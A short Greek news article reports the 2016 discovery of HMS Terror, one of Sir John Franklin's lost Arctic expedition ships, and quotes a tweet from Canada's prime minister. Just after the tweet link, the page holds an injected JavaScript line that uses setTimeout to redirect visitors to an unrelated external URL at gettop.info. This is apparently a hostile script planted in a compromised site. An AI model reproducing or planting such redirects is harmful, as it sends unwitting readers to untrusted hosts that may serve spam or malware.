Έπειτα από 170 χρόνια εντοπίστηκε ο «Τρόμος»

0
11

 

Ένα από τα στολίδια του βρετανικού ναυτικού της εποχής απέπλευσε από την Αγγλία στις 19 Μαΐου 1845 με αποστολή να ανακαλύψει το Βορειοδυτικό Πέρασμα, τη θαλάσσια οδό που συνδέει τον Ατλαντικό με τον Ειρηνικό Ωκεανό. Ωστόσο, το πολικό ψύχος στον Καναδά τους αιφνιδίασε και οι 129 ναυτικοί παρέμειναν εγκλωβισμένοι επί ενάμιση χρόνο στους πάγους. Αναγκάστηκαν να εγκαταλείψουν το τρικάταρτο ιστιοφόρο όμως κανείς τους δεν επέζησε.

Το «Terror», ένα από τα δύο πλοία του εξερευνητή σερ Τζον Φράνκλιν, βρέθηκε στις 3 Σεπτεμβρίου σε έναν κόλπο του νησιού του Βασιλιά Γουλιέλμου, στο σημείο όπου ένας Ινούιτ, μέλος μιας επιστημονικής ομάδας, είχε δηλώσει πριν από μερικά χρόνια ότι είχε δει ένα κατάρτι να υψώνεται από την επιφάνεια της θάλασσας. Το άλλο πλοίο του Φράνκλιν που απέπλευσε μαζί με το Terror, το Erebus, εντοπίστηκε στην ίδια περιοχή το 2014.

«Εξαιρετική είδηση: ένα μεγάλο μέρος του μυστηρίου της αποστολής Φράνκλιν θα μπορούσε να διαλευκανθεί», έγραψε στο Twitter ο πρωθυπουργός του Καναδά Τζάστιν Τριντό.

https://twitter.com/JustinTrudeau/status/775487053026906112 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here